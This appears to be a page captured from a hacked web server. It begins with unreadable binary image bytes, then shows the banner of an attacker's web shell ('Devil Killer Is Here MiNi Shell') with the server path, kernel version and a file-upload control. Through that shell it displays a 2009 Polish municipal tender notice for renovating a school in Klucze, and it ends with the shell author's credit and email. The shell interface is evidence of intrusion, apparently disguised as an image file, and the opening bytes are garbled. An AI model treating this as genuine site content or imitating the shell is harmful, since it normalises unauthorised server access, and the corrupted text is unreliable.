JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090721/116331-N-2009.html

<p class="kh_header"><b>Klucze: Kompleksowa termomodernizacja budynku Szkoły Podstawowej i Gimnazjum w Kluczach wraz z instalacją solarną do podgrzewu wody w basenie i ciepłej wody użytkowej.- ETAP  I</b><br>
<b>Numer ogłoszenia: 116331 - 2009; data zamieszczenia: 21.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Klucze , ul. Partyzantów 1, 32-310 Klucze, woj. małopolskie, tel. 032 6428508, faks 032 6428052.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina-klucze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa termomodernizacja budynku Szkoły Podstawowej i Gimnazjum w Kluczach wraz z instalacją solarną do podgrzewu wody w basenie i ciepłej wody użytkowej.- ETAP  I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> polegający na wykonaniu:
1.	Instalacji solarnej do podgrzewu wody basenowej i c.w.u.( kolektory, wymienniki solarne, naczynia wzbiorcze.)
2.	Konstrukcje wsporcze  kolektorów słonecznych ze stali nierdzewnej.
3.	Wymiana instalacji elektrycznej w części budynku - hala basenu.
4.	Modernizacja wentylacji nawiewno - wywiewnej hali basenu ( roboty budowlane  i przebudowa istniejącej wentylatorni centrali klimatyzacyjnej z dwu stopniowym odzyskiem ciepła.

Szczegółowy zakres prac:

	Szczegółowy zakres robót został określony w projekcie budowlanym, specyfikacji technicznej wykonania i odbioru robót, w kosztorysach ślepych oraz w niniejszej  specyfikacji istotnych warunków zamówienia publicznego. Projekt budowlany oraz  specyfikacja techniczna wykonania i odbioru robót są zamieszczone na stronie  internetowej Urzędu: www.gmina-klucze.pl - link BIP-Przetargi, a także są dostępne w siedzibie Zamawiającego - Urząd Gminy Klucze ul. Partyzantów 1 32-310 Klucze pok. Nr 305..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.40.00-0, 45.00.00.00-7, 45.31.00.00-3, 45.33.10.00-6, 45.33.22.00-5, 45.31.73.00-5, 09.33.11.00-9, 42.52.00.00-7, 42.51.00.00-4, 45.31.23.10-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wykonawca zobowiązany jest do wniesienia wadium przed upływem terminu do składania ofert wadium w wysokości 30.000,00 zł (słownie: trzydzieści tysięcy złotych).
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-    
    kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
    ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 		    	Przedsiębiorczości (Dz. U. Nr 42, poz. 275, z  2007).
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego: Bank PEKAO S.A. O/Klucze Nr 48 1240 4748 1111 0000 4868 2084
      z dopiskiem wadium. Dla Zamawiającego dokumentem potwierdzającym dokonanie wpłaty wadium jest uznanie kwoty wadium na rachunku zamawiającego (wpływ środków na rachunek zamawiającego). Za skuteczność operacji finansowo-bankowych odpowiada Wykonawca.
4.	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. Wadium wniesione w formie niepieniężnej należy zdeponować w Urzędzie Gminy Klucze - Referat Księgowości Finansowo - Budżetowej za potwierdzeniem odbioru.
5.	Wadium wniesione w formie gwarancji ubezpieczeniowej lub bankowej będzie akceptowane pod warunkiem:
- gwarancja będzie zawierała wszystkie przypadki utraty wadium przez Oferenta   
  określone w art. 46 ust. 5  Ustawy Prawo zamówień publicznych,
- okres ważności gwarancji będzie nie krótszy niż okres związania z ofertą określony   
  w niniejszej specyfikacji.
6.	Zamawiający zwraca niezwłocznie wadium, jeżeli:
1)	upłynął termin związania ofertą;
2)	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy;
3)	zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
7.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
1) który wycofał ofertę przed upływem terminu składania ofert;
2) który został wykluczony z postępowania;
3) którego oferta została odrzucona.
   8. Złożenie przez wykonawcę, którego oferta została odrzucona lub wykluczona 
     z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez     
     wykonawcę prawa do wniesienia protestu.
  9.Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami 
     wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,  
     pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za   
     przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta   
      została wybrana:	
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach   
    określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z   
    przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy:

1.Posiadają uprawnienia do wykonywania prac objętych zamówieniem, jeżeli 	       	     ustawy nakładają taki obowiązek,

			2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i 			osobami zdolnymi do wykonania zamówienia tzn. rozpoczęli i zakończyli w ciągu ostatnich 5 lat 	przed dniem wszczęcia   postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej dwóch  robót odpowiadających swym 	rodzajem robotom  budowlanym stanowiącym przedmiot zamówienia o wartości nie mniejszej niż oferowana cena brutto a także dysponują osobami zdolnymi 	do wykonania 	zamówienia.
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,

4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia
           	(art. 22 ust.1 i art. 24 ustawy Prawo zamówień publicznych).

	5. Ocena spełnienia warunków udziału w postępowaniu Wykonawców zostanie 		dokonana w oparciu o dostarczone przez Wykonawców dokumenty i 			oświadczenia, o których mowa w pkt. 6 specyfikacji wg formuły spełnia  nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w    	        postępowaniu:

1)	Ofertę  na formularzu  stanowiącym załącznik Nr 1 do SIWZ, wypełniona czytelnie, podpisana i opieczętowana przez osobę/y uprawnione do reprezentowania oferenta
2)	Oświadczenie o spełnianiu warunków określonych przepisami art. 22 ust. 1 ustawy Prawo zamówień publicznych - stanowiące załącznik Nr 2 do SIWZ, 
3)	Kosztorys ofertowy uproszczony z  zestawieniem cen robocizny, sprzętu i materiałów.
4)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej: dokumenty te wystawione nie wcześniej niż 
      6 miesięcy przed upływem terminu składania ofert.
5) Informację z Krajowego Rejestru Karnego albo również zaświadczenie właściwego  	organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie 	określonym 	w art. 24 ust. 1 pkt. 4-8 wystawioną nie wcześniej niż 6 m-cy przed 	terminem składania 	ofert. 
6)  Informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 	wystawioną nie wcześniej niż 6 m-cy przed terminem składania ofert.
7) Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, oraz Zakładu 	Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego 	potwierdzających odpowiednio, że wykonawca nie zalega z opłaceniem podatków, 	opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub przewidziana 	prawem 	zgoda na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności 	wykonawcy lub wstrzymanie w całości wykonania decyzji właściwego organu 	wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania 	ofert. 
8)  Wykaz osób i podmiotów proponowanych do realizacji zadania, wraz z informacjami     
na temat ich kwalifikacji niezbędnych do wykonania  zamówienia wg zał. Nr 4.do SIWZ. Do wykazu należy dołączyć kopie uprawnień budowlanych dla kierownika budowy w branży budowlanej, elektrycznej oraz instalacji sanitarnych, niezbędnych do wykonania prac objętych zamówieniem.
 	Do uprawnień budowlanych należy dołączyć potwierdzenie członkostwa w Izbie 
      Inżynierów Budownictwa (zgodnie z Ustawą z dnia 15.12.2000 r. o samorządach  
      zawodowych architektów, inżynierów budownictwa oraz urbanistów, Dz. U. 5/2001  
      poz. 42 z późn. zmianami).
   9)  Wykaz rozpoczętych i zakończonych w ciągu ostatnich 5 lat przed dniem wszczęcia 		   postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest 			krótszy- w tym okresie, co najmniej dwóch  robót odpowiadających swym rodzajem 			robotom  budowlanym stanowiącym przedmiot zamówienia o wartości nie mniejszej 			niż oferowana  cena brutto, z podaniem ich wartości oraz daty i miejsca  ich 		wykonania (wg zał. Nr 5 do SIWZ).
10)   Referencje potwierdzające, że wymienione powyżej roboty zostały wykonane z 
         należytą starannością , zawierające nazwę, termin realizacji i wartość wykonanych 	robót .
11)   Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest   
        ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, 
        o wartości co najmniej 50 % wartości umowy brutto.
12)	Potwierdzenie wpłaty wadium.
13)	Udzielenie gwarancji na wykonanie przedmiotu zamówienia nie krótszej niż 36 miesięcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gmina-klucze.pl - link BIP- Przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Klucze ul. Partyzantów 1, 32-310 Klucze - pok. nr 305 od wtorku do piątku w godz. od 7.30 do 15.30 w poniedziałek od 7.30 do 17.00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2009 godzina 09:00, miejsce: Urząd Gminy Klucze - pok. Nr 117 (sekretariat) w godzinach pracy urzędu.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com